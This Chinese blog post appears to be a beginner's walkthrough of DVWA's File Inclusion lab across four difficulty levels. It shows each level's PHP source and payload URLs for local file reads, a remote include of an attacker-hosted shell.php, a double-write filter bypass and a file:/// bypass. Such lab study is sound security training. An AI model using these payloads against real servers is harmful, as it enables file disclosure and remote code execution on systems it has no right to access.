2. 程式人生 > 其它 >DVWA之File Inclusion

DVWA之File Inclusion

阿新 發佈:2021-02-19

技術標籤:DVWAshell

學習基礎檔案上傳

low level

檢視原始碼:


<?php

// The page we wish to display
$file = $_GET[ 'page' ];

?>

可以看到程式碼沒有任何限制過濾,可以任意包含檔案…
首先隨便寫個包含檔案:

http://localhost/DVWA/vulnerabilities/fi/?page=111.php

在這裡插入圖片描述
直接報出了網站路徑。。。

需要說明的是:不管檔案字尾是否是php,都會當做php檔案執行,如果檔案內容確認為php,則正常執行並返回結果,如果不是,則返回列印檔案內容,所以檔案包含漏洞常常會導致任意檔案讀取與任意命令執行。

例如:
http://localhost/DVWA/vulnerabilities/fi/?page=E:/webpage/public/DVWA/php.ini

顯示:
在這裡插入圖片描述
會將裡邊的內容顯示出來
這種情況也可能存在遠端檔案包含漏洞

檢視是否存在遠端檔案包含:
例如:

http://localhost/DVWA/vulnerabilities/fi/?page=http://yourip/shell.php

有條件可以測試一下,若存在可以直接通過蟻劍連線

medium level

檢視原始碼:


<?php

// The page we wish to display
$file = $_GET[ 'page' ];

// Input validation
 

$file = str_replace( array( "http://", "https://" ), "", $file );
$file = str_replace( array( "../", "..\"" ), "", $file );

?>

可以看到程式碼中str_replace()函式對“http://”、“https://”、“…/”、“…\”進行了過濾替換為空字元,即刪除~

這中型別的過濾可以直接 雙寫繞過,例如:hthttps://tps://htthttp://p://

,其他的跟low level一樣,不受影響。

high level

檢視原始碼:


<?php

// The page we wish to display
$file = $_GET[ 'page' ];

// Input validation
if( !fnmatch( "file*", $file ) && $file != "include.php" ) {
    // This isn't the page we want!
    echo "ERROR: File not found!";
    exit;
}

?>

fnmatch() 函式根據指定的模式來匹配檔名或字串。
也就是要求page引數的開頭必須是file,伺服器才會去包含相應的檔案。
這個就跟用瀏覽器開啟本地檔案一樣,直接構造payload:

http://localhost/DVWA/vulnerabilities/fi/?page=file:///E:/webpage/public/DVWA/php.ini

在這裡插入圖片描述
同樣可以訪問本地檔案~

impossible level

看程式碼:


<?php

// The page we wish to display
$file = $_GET[ 'page' ];

// Only allow include.php or file{1..3}.php
if( $file != "include.php" && $file != "file1.php" && $file != "file2.php" && $file != "file3.php" ) {
    // This isn't the page we want!
    echo "ERROR: File not found!";
    exit;
}

?>

這種類似於白名單方式,只能是在白名單裡的頁面可以訪問,完美避過了其他檔案包含

<小白初試,希望路過大佬多多指正>

相關推薦

DVWAFile Inclusion

技術標籤:DVWAshell 學習基礎檔案上傳 low level 檢視原始碼: <?php // The page we wish to display

DVWA靶場——File Inclusion(檔案包含)

概述 在 Web 後臺開發中,程式設計師往往為了提高效率以及讓程式碼看起來更加簡潔,會使用 “包含” 函式功能。比如把一系列功能函式都寫進 function.php 中,之後當某個檔案需要呼叫的時候直接在檔案頭中寫上一句 &

新手DVWA-File Inclusion

File Inclusion File Inclusion即檔案包含,是指使用了包含函式時,由於對引數過濾不當,導致使用者讀取和執行了意料之外的內容和命令

DVWA 通關指南:File Inclusion(檔案包含)

目錄File Inclusion(檔案包含)Low Level原始碼審計攻擊方式Medium Level原始碼審計攻擊方式High Level原始碼審計攻擊方式Impossible Level總結參考資料

java開發File類詳細使用方法介紹

File類簡介 在 Java 中,File 類是 java.io 包中唯一代表磁碟檔案本身的物件。File 類定義了一些與平臺無關的方法來操作檔案,File類主要用來獲取或處理與磁碟檔案相關的資訊,像檔名、 檔案路徑、訪問許可權和修改日

File Inclusion - Pikachu

概述: 檔案包含,是一個功能。在各種開發語言中都提供了內建的檔案包含函式,其可以使開發人員在一個程式碼檔案中直接包含(引入)另外一個程式碼檔案。

DVWA檔案上傳與分享

<?php if( isset( $_POST[ \'Upload\' ] ) ) { // Where are we going to be writing to? $target_path= DVWA_WEB_PAGE_TO_ROOT . \"hackable/uploads/\";

java File

淺析理論: 注:java中,\\是轉義字元,如果要表示一個\\字元,則必須轉義(\\\\)

DVWA靶場——File Upload(檔案上傳)

概述 檔案上傳功能在web應用系統很常見,比如很多網站註冊的時候需要上傳頭像、上傳附件等等。當用戶點選上傳按鈕後,後臺會對上傳的檔案進行判斷 比如是否是指定的型別、字尾名、大小等等,然後將其按照設計的格式進

21_IO流File

1. File類概述 File是檔案和目錄名的抽象表示. java中一切都是物件,File這個類就是檔案或者路徑的物件. 這些物件可以表示我們作業系統中的檔案和資料夾. 類中提供的方法可以對檔案進行操作, 建立, 刪除等. 後面學習的

java IO流File類的使用

java高階IO流 目錄java高階IO流File類的使用File類概述路徑分隔符File類常用方法構造方法獲取方法重新命名與判斷方法建立和刪除方法總結歡迎關注

javaIO流File

技術標籤:IOjava FileFile類三種構造方法 在當前目錄下建立一個與Demo.txt檔名相關聯的檔案物件,注意要用雙斜線或反斜槓

2020-12-07-DVWAXSS

layout: post title: DVWAXSS subtitle: 學習學習 date: 2020-12-08 author: lll-yz header-img: img/post-bg-coffee.jpg catalog: true tags:

2020-12-06-DVWAsql

layout: post title: DVWAsql-injection subtitle: 學習學習 date: 2020-12-06 author: lll-yz header-img: img/post-bg-coffee.jpg catalog: true tags:

OSCP Security Technology - Remote File Inclusion(RFI)

OSCP Security Technology - Remote File Inclusion(RFI) DVWA Download and install DVWA . https://dvwa.co.uk/

IO流File

對於File類來說,建立物件就是建立檔案或者資料夾,有3個構造器,絕對路徑或者相對路徑,第一種,直接填寫路徑,第二種,parent,chlid,建立一個上層檔案,跟下層檔案,第三種直接在一個物件下建立檔案

JavaSE常用類File

File類 只用於表示檔案或目錄的資訊,不能對檔案內容進行訪問。 java.io.File類∶代表檔案和目錄。在開發中,讀取檔案、生成檔案、刪除檔案、修改檔案的屬性時經常會用到本類。

DVWA命令注入

DVWA命令注入   LOW 老規矩先看下原始碼 <?php if( isset( $_POST[ \'Submit\' ]) ) { // Get input

新手DVWA-File Upload

File Upload File Upload即檔案上傳,是指在由於沒有對上傳檔案進行有效過濾的情況下,使使用者上傳非法檔案獲得伺服器許可權

Dvwa教程命令列注入(二)

Command Injection,即命令注入,是指通過提交惡意構造的引數破壞命令語句結構,從而達到執行惡意命令的目的。PHP命令注入攻擊漏洞是PHP應用程式中常見的指令碼漏洞之一